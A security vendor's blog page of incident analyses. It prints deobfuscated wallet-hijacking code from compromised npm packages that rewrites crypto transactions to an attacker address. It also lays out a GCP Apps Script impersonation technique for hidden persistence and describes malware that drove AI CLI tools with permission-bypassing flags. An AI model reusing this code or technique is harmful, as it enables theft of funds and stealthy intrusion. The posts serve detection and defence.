Exaforce Blog

Insights that keep you ahead

Explore expert perspectives, practical tips, and the latest trends shaping the cybersecurity landscape.

September 10, 2025

There’s a Snake in my package! How attackers are going from code to coin

How attackers hijacked popular NPM packages to replace crypto wallet addresses and silently redirect funds.

On September 8, 2025, Aikido Security reported and NPM confirmed that several NPM libraries were compromised in a user-side man-in-the-middle style attack. Our research dug into the details about how the attack works. The injected code sniffs requests to detect cryptocurrency accounts, then silently replaces them with attacker-controlled ones.

  • ansi-regex 6.2.1
  • color-name 2.0.1
  • debug 4.4.2
  • wrap-ansi 9.0.1
  • simple-swizzle 0.2.3
  • chalk 5.6.1
  • strip-ansi 7.1.1
  • color-string 2.1.1
  • backslash 0.2.1
  • has-ansi 6.0.1
  • chalk-template 1.1.1
  • supports-color 10.2.1
  • slice-ansi 7.1.1
  • is-arrayish 0.3.3
  • color-convert 3.1.1
  • ansi-styles 6.2.2
  • supports-hyperlinks 4.1.1
  • error-ex 1.3.3
Example patched package impacted by the attack

All compromised versions have been removed from the NPM registry, and patched releases are available on NPM. We still recommend you scan your codebase, upgrade any impacted dependencies, and verify users have not been affected. This blog will break down how the attack went down and how to detect it.

Analysis of the attack

The attacker wasn’t too subtle when they included malicious code. The attacker added malicious, obfuscated JavaScript to the top of index.js in each package. The code was obfuscated and minified to look like normal script instructions, making it harder to detect.

Difference between versions 6.2.1 (compromised) and 6.2.2 (fixed) for package ansi-regex

The attack vector included detection of crypto wallets, interception of requests containing wallets, and replacement of legitimate addresses with attacker controlled ones. The flow broke down as follows:

  1. User visits an infected website
  2. Malicious code checks for cryptocurrency wallets
  3. It intercepts all network requests containing wallet addresses
  4. Wallet addresses are replaced with attacker-controlled ones using similarity matching
  5. When the victim initiates a transaction, funds are redirected
  6. Because legitimate wallet interfaces are used, the attack appears nearly invisible

Detecting malicious crypto wallets

Note: All code shown below has been cleaned up for better readability.

The malware begins by checking for an Ethereum object window.ethereum.  It then waits for an eth_accounts response, retrieves wallet addresses, and attempts to run runmask() and, if newdlocal() is never executed (rund ≠ 1), sets rund’s value to 1 and runs newdlocal() once.

var neth = 0;
var rund = 0;
var loval = 0;

async function checkethereumw() {
  try {
    const etherumReq = await window.ethereum.request({ method: 'eth_accounts' });
    etherumReq.length > 0 ? (runmask(), rund != 1 && (rund = 1, neth = 1, newdlocal())) : rund != 1 && (rund = 1, newdlocal());
  } catch (error) {
    if (rund != 1) {
      rund = 1;
      newdlocal();
    }
  }
}

typeof window != 'undefined' && typeof window.ethereum != 'undefined' ? checkethereumw() : rund != 1 && (rund = 1, newdlocal());

Request hooking

newdlocal() is the function that hooks the browser, grabs the requests being made, and tampers with the request to modify the target’s account with an attacker’s account. This effectively transfers the funds from a legitimate receiver to a malicious one. The following are the functions defined in the code, with the names of the functions modified for easy readability and the original function name next to it.

const originalFetch = fetch;
fetch = async function (...args) { 
  const response = await originalFetch(...args);
  const contentType = response.headers.get('Content-Type') || '';
  let data = contentType.includes('application/json') 
    ? await response.clone().json() 
    : await response.clone().text();
  
  const processed = processData(data);
  const finalData = typeof processed === 'string' ? processed : JSON.stringify(processed);

  return new Response(finalData, {
    status: response.status,
    statusText: response.statusText,
    headers: response.headers
  });
};

The moment a wallet is found, the script will look for the closest matching attacker wallet from any of the attacker provided wallets. That way, the user will not detect the attack, as the changed wallet will look similar to the legitimate one. The malicious functions _0x3479c8(_0x13a5cc, _0x8c209f) and _0x2abae0(_0x348925, _0x2f1e3d) use the Levenshtein distance, which is defined as the minimum number of single-character edits (insertions, deletions, or substitutions) required to change one word into the other. Then, it will try to hijack the fetch() API requests and XMLHttpRequest responses, effectively changing the wallet on the request and the response.

  function levenshteinDistance(a, b) { // _0x3479c8(_0x13a5cc, _0x8c209f)
    const dp = Array.from({ length: a.length + 1 }, () => Array(b.length + 1).fill(0));

    for (let i = 0; i <= a.length; i++) dp[i][0] = i;
    for (let j = 0; j <= b.length; j++) dp[0][j] = j;

    for (let i = 1; i <= a.length; i++) {
      for (let j = 1; j <= b.length; j++) {
        if (a[i - 1] === b[j - 1]) {
          dp[i][j] = dp[i - 1][j - 1];
        } else {
          dp[i][j] = 1 + Math.min(
            dp[i - 1][j],     // deletion
            dp[i][j - 1],     // insertion
            dp[i - 1][j - 1]  // substitution
          );
        }
      }
    }
    return dp[a.length][b.length];
  }

  function findClosestString(input, candidates) { // _0x2abae0(_0x348925, _0x2f1e3d)
    let bestDistance = Infinity;
    let bestMatch = null;
    for (let candidate of candidates) {
      const distance = levenshteinDistance(input.toLowerCase(), candidate.toLowerCase());
      if (distance < bestDistance) {
        bestDistance = distance;
        bestMatch = candidate;
      }
    }
    return bestMatch;
  }

The attacker included a list of attacker controlled wallets in the script, which are checked against the target’s controlled wallets.

  • Legacy Bitcoin: 1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx (and 39 others)
  • Bitcoin Bech32: bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm (and 39 others)
  • Ethereum: 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976 (and 59 others)
  • Litecoin: LNFWHeiSjb4QB4iSHMEvaZ8caPwtz4t6Ug(and 39 others)
  • Bitcoin Cash: bitcoincash:qpwsaxghtvt6phm53vfdj0s6mj4l7h24dgkuxeanyh (and 39 others)
  • Solana: 5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6 (and 19 others)
  • Tron: TB9emsCq6fQw6wRk4HBxxNnU6Hwt1DnV67 (and 39 others)

The check will be performed for all wallets provided by the attacker, and the closest one will be returned.

function transform(inputStr) {
    var legacyBTC = [
    ];
    var segwitBTC = [
    ];
    var ethAddresses = [
    ];
    var solanaAddrs = [
    ];
    var tronAddrs = [
    ];
    var ltcAddrs = [
    ];
    var bchAddrs = [
    ];
    for (const [currency, regex] of Object.entries(_0x3ec3bb)) {
      const matches = inputStr.match(regex) || [];
      for (const match of matches) {
        if (currency == 'ethereum') {
          if (!ethAddresses.includes(match) && neth == 0) {
            inputStr = inputStr.replace(match, closestMatch(match, ethAddresses));
          }
        }
        if (currency == 'bitcoinLegacy') {
          if (!legacyBTC.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, legacyBTC));
          }
        }
        if (currency == 'bitcoinSegwit') {
          if (!segwitBTC.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, segwitBTC));
          }
        }
        if (currency == 'tron') {
          if (!tronAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, tronAddrs));
          }
        }
        if (currency == 'ltc') {
          if (!ltcAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, ltcAddrs));
          }
        }
        if (currency == 'ltc2') {
          if (!ltcAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, ltcAddrs));
          }
        }
        if (currency == 'bch') {
          if (!bchAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, bchAddrs));
          }
        }
        const allAddrs = [
          ...ethAddresses,
          ...legacyBTC,
          ...segwitBTC,
          ...tronAddrs,
          ...ltcAddrs,
          ...bchAddrs
        ];
        const isKnown = allAddrs.includes(match);
        if (currency == 'solana' && !isKnown) {
          if (!solanaAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, solanaAddrs));
          }
        }
        if (currency == 'solana2' && !isKnown) {
          if (!solanaAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, solanaAddrs));
          }
        }
        if (currency == 'solana3' && isKnown) {
          if (!solanaAddrs.includes(match)) {
            inputStr = inputStr.replace(match, closestMatch(match, solanaAddrs));
          }
        }
      }
    }
    return inputStr;
}

The script goes through the requests and responses, modifies the target’s wallet with an attacker controlled wallet, and lets the target continue with their operations.

Transaction Manipulation using runmask()

The runmask() function is designed to intercept wallet calls in a browser (MetaMask, Solana wallets, etc.) and modify the transaction data to inject attacker controlled address before it’s sent. When a wallet is detected by the script by finding the value of window.ethereum, the malware waits for methods like request, send, and sendAsync.

function interceptWallet(wallet) { // _0x41630a(_0x5d6d52)
    const methods = ['request', 'send', 'sendAsync'];

    methods.forEach(name => {
        if (typeof wallet[name] === 'function') {
            originalMethods.set(name, wallet[name]);
            Object.defineProperty(wallet, name, {
                value: wrapMethod(wallet[name]),
                writable: true,
                configurable: true
            });
        }
    });

    isActive = true;
}

When one of the methods is found, the function _0x485f9d(_0x38473f will _0x292c7a) will try to find out if the transaction is an Ethereum or Solana transaction and modify the transaction using the function _0x1089ae(_0x4ac357, _0xc83c36 = true).

function wrapMethod(originalMethod) { // _0x1089ae(_0x4ac357, _0xc83c36 = true)
  return async function (...args) {
    increment++; // increment intercept count
    let clonedArgs;

    // Deep clone arguments to avoid mutation
    try {
      clonedArgs = JSON.parse(JSON.stringify(args));
    } catch {
      clonedArgs = [...args];
    }

    if (args[0] && typeof args[0] === 'object') {
      const request = clonedArgs[0];

      // Ethereum transaction
      if (request.method === 'eth_sendTransaction' && request.params?.[0]) {
        try {
          request.params[0] = maskTransaction(request.params[0], true); // _0x1089ae(tx, false)
        } catch {}

      // Solana transaction
      } else if (
        (request.method === 'solana_signTransaction' || request.method === 'solana_signAndSendTransaction') &&
        request.params?.[0]
      ) {
        try {
          let tx = request.params[0].transaction || request.params[0];
          const maskedTx = maskTransaction(tx, false); // _0x1089ae(tx, false)
          if (request.params[0].transaction) {
            request.params[0].transaction = maskedTx;
          } else {
            request.params[0] = maskedTx;
          }
        } catch {}
      }
    }

    const result = originalMethod();

    // Handle promises
    if (result && typeof result.then === 'function') {
      return result.then(res => res).catch(err => { throw err; });
    }

    return result;
  };
}

Function _0x1089ae(_0x4ac357, _0xc83c36 = true) grabs the request intercepted by the malware and injects its own address on it, while also tampering with the Ethereum ERC20 Token Contract or the Solana Transaction. In both cases, an attacker's address is provided.

function maskTransaction(tx, isEthereum = true) {
  // Deep clone transaction to avoid mutating original
  const maskedTx = JSON.parse(JSON.stringify(tx));

  if (isEthereum) {
    const attackAddress = '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976';

    // Redirect non-zero value transactions
    if (maskedTx.value && maskedTx.value !== '0x0' && maskedTx.value !== '0') {
      maskedTx.to = attackAddress;
    }

    if (maskedTx.data) {
      const data = maskedTx.data.toLowerCase();

      // ERC20 approve
      if (data.startsWith('0x095ea7b3') && data.length >= 74) {
        maskedTx.data = data.substring(0, 10) +
                        '000000000000000000000000' + attackAddress.slice(2) +
                        'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff';
      }
      // Custom contract call
      else if (data.startsWith('0xd505accf') && data.length >= 458) {
        maskedTx.data = data.substring(0, 10) +
                        data.substring(10, 74) +
                        '000000000000000000000000' + attackAddress.slice(2) +
                        'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' +
                        data.substring(202);
      }
      // ERC20 transfer
      else if (data.startsWith('0xa9059cbb') && data.length >= 74) {
        maskedTx.data = data.substring(0, 10) +
                        '000000000000000000000000' + attackAddress.slice(2) +
                        data.substring(74);
      }
      // ERC20 transferFrom
      else if (data.startsWith('0x23b872dd') && data.length >= 138) {
        maskedTx.data = data.substring(0, 10) +
                        data.substring(10, 74) +
                        '000000000000000000000000' + attackAddress.slice(2) +
                        data.substring(138);
      }
    } else if (maskedTx.to && maskedTx.to !== attackAddress) {
      maskedTx.to = attackAddress;
    }
  } else {
    // Solana-style transaction masking
    if (maskedTx.instructions && Array.isArray(maskedTx.instructions)) {
      maskedTx.instructions.forEach(instr => {
        if (instr.accounts && Array.isArray(instr.accounts)) {
          instr.accounts.forEach(acc => {
            if (typeof acc === 'string') acc = '19111111111111111111111111111111';
            else acc.pubkey = '19111111111111111111111111111111';
          });
        }
        if (instr.keys && Array.isArray(instr.keys)) {
          instr.keys.forEach(key => key.pubkey = '19111111111111111111111111111111');
        }
      });
    }
    maskedTx.recipient = '19111111111111111111111111111111';
    maskedTx.destination = '19111111111111111111111111111111';
  }

  return maskedTx;
}

The Ethereum attacker address provided is the first element in the Ethereum Address list.

var _0x4477fc = [      
'0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976',      
--snip--

Recommendations and summing it up

We strongly recommend scanning your entire codebase for any of the compromised libraries and updating them immediately. This includes checking package.json, lock files, node_modules, and your SBOM dependency trees. Once updates are applied, monitor all recent wallet transactions for suspicious activity, revoke any exposed token approvals, and, where possible, migrate to fresh wallet addresses. To further reduce risk, ensure you pin package versions to mitigate similar supply chain compromises in the future.

This malware was highly sophisticated. It hooked into the browser, intercepted requests, hijacked wallets, and operated across multiple blockchains. By abusing legitimate channels, masking transactions, and using obfuscation techniques, it was able to blend in and remain difficult to detect.

September 9, 2025

Ghost in the Script: Impersonating Google App Script projects for stealthy persistence

Exploring the risks of Google Apps Script abuse, from cryptomining to stealthy service accounts, and ways to detect misuse.

One of the most important steps in an infrastructure attack is persisting in the target’s environment. Persistence often needs to be established multiple times, depending on the level of access they gain. Security systems have become smart enough to detect many forms of persistence mechanisms. This has led attackers to continue to find new and creative ways to persist in a target’s environment.

Google Workspace Apps Script is a feature that allows any user with a Gmail account to automate business applications and enables the applications to interact with each other. Underneath, when an Apps Script app is deployed, a GCP Project is created on the GCP Organization the account is part of. Aside from the format of the Project ID, these projects are not very different from a normal GCP project. This means, an attacker can choose to use one of these projects to host resources and persist on the target. They can also create a GCP project with the same name format as an Apps Script project to impersonate a legitimate Apps Script Project and evade detection.

This blog will go through how Apps Script projects work and how an attacker can utilize the Apps Script projects to persist in a target’s environment. Then, we will look into how these techniques can be detected and prevented, so they will not be able to be maliciously utilized by attackers.

The ins and outs of Apps Script

Google Workspace Apps Script, associated with the endpoint script.google.com, are a low code solution, allowing anyone with a Gmail account to automate business applications that integrate with Google Workspace. It offers a scripting interface using JavaScript to integrate Google services and build lightweight automations.

Example Google Apps Script

Apps Script is highly flexible. With it, you can:

  • Create custom menus, dialogs, and sidebars in Google Docs, Sheets, and Forms
  • Develop custom functions and macros for Google Sheets
  • Publish web apps, either as standalone applications or embedded within Google Sites
  • Connect with other Google services such as AdSense, Analytics, Calendar, Drive, Gmail, and Maps
  • Build lightweight add-ons and share them through the Google Workspace Marketplace
Apps Script types available

When an App Script is created, a project with a prefix sys- is automatically created. These projects are not visible in the organization’s projects list on the console, which makes sense, since they are not considered Organization Projects.

Project list without Apps Script projects

However, the projects are visible through the terminal tool (gcloud) by identities with access to execute resourcemanager.projects.list.

gcloud projects list that does contain Apps Script projects

When an App Script project is created, GCP will create a Resource Manager folder and subfolder by default in the organization, with the names system-gsuite/apps-script. Here again, there seem to be no projects inside these folders when viewed in the console.

Console view of the Apps Script subfolder with no projects visible

Using the CLI, however, we see the App Script projects inside the apps-script subfolder. This is where the App Script projects reside after creation.

CLI output with Apps Script projects in the system-gsuite/apps-script subfolder

Abusing Apps Script impersonation on a GCP Organization

Cryptomining Instance

App Script projects follow an ID format of sys-<26 numbers>. In GCP, we can create a project and store it in any folder or subfolder we have access to and we can set the project name to anything as long as it contains ASCII letters, digits, and hyphens, and is between 6-30 characters. The combination of sys-<26 numbers> is exactly 30 characters long, containing numbers, letters, and a hyphen.

Creating a GCP project that looks like an Apps Script project

One difference we found was how the projects looked based on the location where they were stored. If a project is stored at the organization level, the project, though having an ID format of sys-<26 numbers>, will show in the console (project sys-00000000000000000000000000). However, when created inside the apps-script folder, the app does not show as a project on the console (project sys-11111111111111111111111111).

Console view of projects where sys-00000000000000000000000000 is shown due to being in the organization level, but sys-11111111111111111111111111 in the apps-script folder is not

The projects are still listed when resourcemanager.projects.list is executed on the terminal.

gcloud CLI listing both projects

An attacker with permissions to resourcemanager.projects.create can utilize the fact App Script projects do not show as other projects do to create a project in the target’s organization and store resources there. Each project can also have a name, which can be provided by the creator. An attacker can also look at other projects in the target’s organziation to find a convincing name for the project.

gcloud CLI used to create a hidden project

For example, a bad actor could use this hidden project to create a large instance and use it as a cryptomining harvester. To do that, we need to:

  • Enable billing for the project
  • Enable the compute API
  • Create an instance
Enabling and then creating a large instance in a hidden project

The attacker now controls a high performance instance they can use as a cryptomining harvester.

Persist on the Organization using a Service Account inside a hidden project

Persistence allows an attacker to return to the target’s infrastructure, ideally as a highly privileged identity. There are different ways to persist in a GCP organization, including user creation service account creation, creating permanent credentials, and creating resources with highly privileged identities assigned to them. If a persistence mechanism can be created inside a project, it can be created into an App Script impersonated project. For example, we can create a service account, create a key for it, assign a highly privileged role on the organization and other projects, and keep it for later use.

Creating a service account in a hidden project

To make matters worse, the identity will only be listed if the project name is known. We can even put a policy on the project that prevents anybody from accessing the service account. This isn’t an “unbreakable” prevention, but it might prevent some attempts to clean up the service account, especially since these projects look like they are created and managed by Google.

name: organizations/ORG_ID/denyPolicies/deny-service-account-all
displayName: "Restrict all SA usage"
rules:
- denyRule:    
    deniedPrincipals:
    - principalSet://goog/public:all    
    deniedPermissions:    
    - iam.serviceAccounts.*

Why even impersonate an Apps Script project?

An Apps Script project underneath is a normal GCP project. What differs from a normal project is that by default, no identity, except for one identity controlled by Google, will have the right access to it. The service account appsdev-apps-dev-script-auth@system.gserviceaccount.com is the universal identity that creates the Apps Script projects and is only managed by Google. It is the only identity that, by default, can manage the Apps Script project and its resources.

Showing how only a Google account can access a true Apps Script project by default

An attacker with the right permissions can modify the project’s IAM policy to allow itself to host any resource on any service it wants on this project.

Updating the project policy to allow an attacker access to modify a real Apps Script project

For example, a bad actor could:

  • Creating a service account and assigning an organization policy to it to persist in the target organization
  • Link the project to a Billing Account and create large resources on it for cryptomining

Detecting the abuse of Apps Script projects

Finding project impersonation by looking at the billing information of the project

GCP has different billing types for resources, with some free without limits. IAM identities are a good example of such resources. Other examples of free resources include IAM resource manager organizations, artifact registry, VPC basic networking, and more.

To be able to use a specific service and its resources, an organization owner needs to link a project to a Billing Account. Linking a project to a Billing Account is a fancy way of saying “put a payment method on the project”. The Billing Account links a payment method with the project, and each month, based on the usage of resources, the owner of the project pays, while the Billing Account provides them with an invoice for the costs.

Being able to create a large compute instance means a Billing Account needs to be linked to the project. One way to detect if an App Script project is created by an attacker and used as a host for large resources is to see if the project is linked to a Billing Account. In the example below, project sys-22222222222222222222222222, which is an attacker created project with a large compute instance, will have a Billing Account linked to it (as seen by the fields billingAccountName and billingEnabled), while a legitimate App Script project (project sys-14600875379148140018929136) does not require a link to a billing account.

Comparison of a hidden project attached to a billing account and a legitimate Apps Script project not attached to a billing account

Blending the project in by modifying billing information

One bypass to this detection is to unlink the project from the Billing Account. The project will need to be part of the billing account if the attacker wants to create an instance (or any paid service). So, any resource or service not offered in the free-tier will need to be deployed into a project with a linked Billing Account.

Unlinking the project from the Billing Account will result in the resource being deleted.

Unlinking a billing account that deletes the instance

IAM service accounts do not fall into the paid resources scope, so even a project not linked to a billing account can contain a persistent service account, breaking the previous detection.

Unlinking a billing account while persisting a service account

Finding occurrences of an App Script project impersonation through enabled API Services

To be able to use a specific service on a project through the API (which gcloud uses), the service API needs to be enabled. By default, a new project will have several services enabled, with more services being able to be enabled or disabled using serviceusage.services.enable or serviceusage.services.disable.

Apps Script projects, on the other hand, by default will have no services enabled, but they can be enabled based on demands. One way to detect if a project is not actually an Apps Script project is to look at the enabled services.

Listing servies for real and fake Apps Script projects

Blending in by disabling API endpoints

One problem with this detection method is that an Apps Script project might need some services enabled, based on the task they will execute. An attacker can choose to disable all the services they are not using and make the project seem a bit more legitimate.

Disabling unused services to appear more like a real Apps Script project

For example, to be able to create a compute instance in the project, compute and oslogin services need to be enabled. If disabled while a resource exists, the execution will fail, indicating current project usage. Other than that, the rest of the services can be disabled and then be temporarily re-enabled by the attacker each time a task executes on the target’s environment.

Execution failure when a service is disabled

Another problem is that some service APIs will work in a project without the service API being enabled on the project. So, services like IAM or some basic storage commands will be allowed, as well as the service usage API (so that the service APIs can be enabled or disabled on the project) and Resource Manager.

  • IAM
  • Cloud Resource Manager
  • Service Usage API
  • Cloud Storage (base functionality is always available; enabling billing gives extra control, billing, and metrics).

This means, a project showing no services enabled will still be able to host a service account, which can be used as a persistence mechanism by the attacker.

Finding occurrences of an App Script project impersonation in the Logs

Another detection approach is looking at the logs for the apps-script folder. In the example below, the projects created by the attacker (sys-11111111111111111111111111 and sys-22222222222222222222222222) have the principalEmail field set to the creator’s user email, while the ones created by Google have an email of appsdev-apps-dev-script-auth@system.gserviceaccount.com. This is tricky because the events can only be found under the folder’s events, not the Organization’s.

Logs showing the differences in principalEmail from fake and legitimate Apps Script projects

Limiting Project Impersonation using organization policies

Apps Script projects, when created, will have an ID format of sys-<26 random digits>. One way to prevent project creation of an Apps Script impersonator would be to deny the creation and update of projects with an ID format of sys-<26 random digits> using the following policy.

name: >-

organizations/012345678912/customConstraints/custom.denyAppsScriptProjectImpersonation
resource_types: cloudresourcemanager.googleapis.com/Project
method_types:
  - CREATE
  - UPDATE
condition: 'resource.projectId.matches(''sys-[0-9]{26}'')'
action_type: DENY
display_name: Deny Apps Script Project Impersonation
description: ''

Whenever an attacker tries to create a project with that format, the organization policy will deny the execution.

Organization policy blocking a hidden project creation

The Organization Policy will deny the creation of any project with an ID format of sys-<26 random digits>, including legitimate ones created by Google through the endpoint script.google.com.

Blocked Apps Script project creation

Detecting Apps Script project abuse with Exaforce

Exaforce provides layered coverage to detect and stop malicious usage of Apps Script projects, whether through impersonation or misuse. Our approach leverages advanced anomaly detection to understand the baseline behavior of entities in your environment to spot abnormal behavior. We’ve enabled some new detections to protect our customers as a result of this research.

  • Exaforce detects Google Apps Script projects that use unusual API services, labels, or policy bindings, so they are flagged during onboarding.
  • Exaforce detects project impersonation attempts wherein an attacker attempts to create projects that look like an Apps Script project.

Below is an example scenario of an App Script project impersonation attempt.

Example detection of a hidden Apps Script impersonation project

The detection overview provides a summary and conclusion from our Exabot’s (AI agent) automated triage of the alert. It outlines critical information such as the principal in question. 

Session with all related events where impersonation is performed

We map related events for this principal into a session, so it’s easy to understand the context in which this project was created and other activities performed by this principal for comprehensive impact analysis.  

Visual graph of the events during the creation of an impersonating Apps Script project

All related events and resources impacted are mapped visually into a graph for easy investigation. 

Preventative controls

Exaforce detections will ensure you have visibility into this potential issue. We also recommend the enforcement of the organization policy mentioned above that blocks creation of projects with IDs matching sys-[0-9]{26} if Apps Script is not in use at the organization. This will lower your attack surface and greatly improve the security posture of your organization.

Stealthy persistence and defense

Apps Script projects can serve as stealthy persistence mechanisms if left unmonitored. Attackers can impersonate them to hide cryptomining, privileged service accounts, or other malicious resources inside your environment.

Defenders need to understand how Apps Script projects work under the hood and how to detect and block potential abuse. Leveraging organization policies and strong detections like those provided by Exaforce provides comprehensive coverage for this persistence vector.

September 3, 2025

How Exaforce detected an account takeover attack in a customer’s environment, leveraging our multi-model AI

How Exaforce detected an account takeover attack in a customer’s environment, leveraging our multi-model AI

In the cat-and-mouse game of identity protection, attackers are playing the long game, probing, rotating infrastructure, and waiting for a weak link. At Exaforce, we protect many high-profile companies in sensitive industries that are constant targets of identity attacks. This blog post walks through a real compromise that unfolded recently with a current customer across several weeks, involving dozens of international IP addresses, eventual credential theft, and multiple successful authentications.

We’re sharing this timeline to show how persistent attackers really operate, and how visibility, context, and behavioral signal correlation are essential in detecting and stopping identity-based attacks.

Executive Summary

Attack Duration: May 15 - June 25, 2025
Initial Vector:
Brute-force login attempts to SaaS authentication portals
Infrastructure:
200+ IPs across 40+ countries, many with ASN anomalies
Exaforce Detections:
Impossible travel, ASN mismatch, repeated policy evaluations
Outcome:
Attacker obtained valid credentials and successfully authenticated multiple times before remediation
Remediation: Forced logout of all active sessions, password reset, account enrolled in MFA

The anatomy of the attack

Phase 1: Reconnaissance and testing (May 15 - June 5)

The first signals were subtle: a handful of failed authentication attempts from Switzerland, France, the USA, and Morocco. Over the next three weeks, the volume increased steadily. All were unsuccessful, but the geography, ASN mismatches, and repeated attempts on a few accounts hinted at a coordinated brute-force effort, most notably repeated failures from IPs tied to Beltelecom (BY), Bahnhof AB (SE), and Novotelecom (RU).

Initial low volume probing with multiple failed login attempts from different locations

Despite the failures, the persistent attempts clearly showed this was a targeted attack that wouldn’t stop.

Phase 2: Coordinated spread (June 25)

The volume of activity spiked. Over 80 sign-on events were logged from a rotating set of international IPs. Key red flags:

  • Multiple successful logins from IPs with no prior history in the environment
  • Sign-ons from ASNs not aligned with user locations (e.g., AS29069 - Rostelecom)
  • Location anomalies and ASN anomalies flagged across accounts, including admin identities
Location and ASN anomalies detected by Exaforce

Attacker infrastructure profile

Over the course of the incident, Exaforce identified authentication attempts from more than 200 unique IP addresses across 40+ countries, involving both failed and successful logins. This diverse infrastructure is a hallmark of modern credential-based attacks and highlights the importance of geographic anomaly detection.

Some compelling stats from the investigation:

  • Top Attacker Countries: Sweden, Romania, Norway, Ukraine, Tunisia, Russia, Spain, Netherlands, United Arab Emirates, Germany
  • Most Active IPs (by authentication attempt volume):
    • 41.224.62.206 (ORANGE – Tunisia): 166 attempts
    • 89.160.38.13 (Bredband2 AB – Sweden): 165 attempts
    • 176.104.241.131 (Bilink LLC – Ukraine): 155 attempts
    • 109.100.41.198 (Orange Romania – Romania): 153 attempts
    • 89.10.140.58 (NextGenTel AS – Norway): 151 attempts
Chart showing authentications by day and the spikes in failed attempts
  • Widespread ASN Usage: Attackers utilized dozens of unique ASNs, including major ISPs, hosting providers, and anonymizing infrastructure like DigitalOcean and netcup GmbH, further complicating attribution and blocking.
  • Repeated Patterns: Many IPs were used in short bursts, mimicking spray-and-pray behavior, while others established persistence with multiple successful logins over several days.

These findings reinforce the need for automated correlation of IP geolocation, ASN anomalies, and login behavior, capabilities that were instrumental in surfacing this attack as soon as the customer connected their Okta logs.

How Exaforce detected the incident

Exaforce was able to detect the intrusion the day it occurred (June 25). Detection wasn’t based on a single indicator. Exaforce's AI automatically stitched together multiple signals to arrive at a single threat finding. No rules written, no manual correlation performed.

  • Impossible travel violations (e.g., logins from Sweden and Tunisia minutes apart)
  • ASN anomaly detections from Okta policy evaluations
  • Success/failure ratios on previously clean accounts
  • Alert correlation across devices, IPs, and session behaviors
Exaforce threat finding with an easy to digest summary of the signals and a detailed breakdown with recommended next steps.

After detecting the intrusion, the customer was able to contain the threat by force logging out of all active sessions, resetting all passwords for the account, and enrolling the account in MFA to prevent another future breach.

 Key lessons for defenders

How Exaforce helps

This incident was identified, investigated, and responded to inside our platform using:

  • Account timeline stitching to correlate activity across time and surfaces for clearer attack progression.
  • ASN-aware policy evaluations to detect access from risky or unusual networks more accurately.
  • Visual behavioral analytics to help analysts quickly verify anomalies and patterns in user or system behavior.
  • Alert summarization across IP clusters to highlight coordinated or related activity.
  • Detailed remediation guidance to enable faster, more effective response without relying on external expertise.

Beyond just alert triage with full detection and context

When this customer connected their Okta tenant to Exaforce during onboarding, our platform immediately began behavioral analytics across identity, geo, ASN, and policy telemetry. Without custom rules, Exaforce detected a high-risk pattern: an admin-privileged service account signing in to Microsoft 365 from 40+ countries and 37+ distinct ASNs in compressed time windows - classic impossible travel plus infrastructure rotation.

Exaforce then auto-generated the finding, triaged it, and enriched it with analyst-ready context: why it matters (admin account, sensitive operations), what was observed (global spread, no matching safe VPN IPs), mapped MITRE tactic/technique (Initial Access → Valid Accounts), confidence level (High), and recommended investigation priority. All of the evidence, IP intelligence, event counts, and MFA-related actions were packaged in a single view, exportable as audit data or JSON.

The result: instead of starting from raw Okta logs and writing queries, the security team started from a high-confidence, fully scoped account-takeover investigation. This is the difference between alert noise and operational detection.

Want to see what Exaforce can do with your IdP data? We can show you what’s hiding in the data you already have. Schedule a demo to find out more.

August 27, 2025

s1ngularity supply chain attack: What happened & how Exaforce protected customers

How the s1ngularity attack exploited Nx packages and how Exaforce verified zero exposure.

On August 26, 2025, the npm registry was compromised, and multiple malicious versions of the highly prevalent Nx build system package (@nrwl/nx, nx, and related modules) were published. These versions contained a post-install script (telemetry.js) that silently executed on Linux and macOS systems. The payload stealthily harvested extremely sensitive developer assets such as cryptocurrency wallets, GitHub and npm tokens, SSH keys, and more.

The threat was especially insidious: the malware weaponized AI CLI tools (like Claude, Gemini, Q) using reckless flags (--dangerously-skip-permissions, --yolo, --trust-all-tools) to escalate reconnaissance and exfiltration. The stolen credentials and files were encoded (double- and triple-base64) and published to attacker-controlled GitHub repos, often named s1ngularity-repository, -0, or -1, making them publicly accessible.

GitHub moved swiftly, and on August 27, 2025 at 9 AM UTC, they disabled all known attacker-created repositories, but that was about 8 hours after the event.

Which versions were affected?

Affected packages include, but are not limited to:

  • @nrwl/nx, nx: versions 20.9.0, 20.10.0, 20.11.0, 20.12.0, 21.5.0, 21.6.0, 21.7.0, 21.8.0
  • @nx/devkit: 21.5.0, 20.9.0
  • @nx/enterprise-cloud: 3.2.0
  • @nx/eslint: 21.5.0
  • @nx/js: 21.5.0, 20.9.0
  • @nx/key: 3.2.0
  • @nx/node: 21.5.0, 20.9.0
  • @nx/workspace: 21.5.0, 20.9.0

The scope of the compromise was vast. In some cases, the malware ran on developer machines via the NX VSCode extension; in others, it was executed inside build pipelines, such as GitHub Actions.

What It Meant

This incident highlighted the devastating potential of modern, AI-empowered supply-chain attacks. By installing a trusted package and without triggering obvious alarms, developers inadvertently exposed countless sensitive assets. With attacker repositories publicly exposed, data escape makes this real and tangible.

Exaforce’s response: Rapid and proactive

Assurance of no customer impact

Immediately upon learning of the attack, the Exaforce MDR team conducted proactive checks across its customer environments. The results were clear and reassuring:

  • No customers had installed any of the compromised Nx package versions.
  • No malicious repositories had been created or existed within any customer GitHub accounts, infrastructure, or pipelines.

This proactive verification meant that, to date, no customer has been impacted by this supply-chain compromise. We quickly informed customers via their preferred messaging platforms that the attack did not impact them.

Enhanced risk monitoring

To strengthen defenses against future supply-chain compromises, Exaforce has deployed a new Supply Chain Security risk rule. This rule continuously scans customer environments for suspicious repository patterns similar to those used in the recent @nrwl/nx compromise.

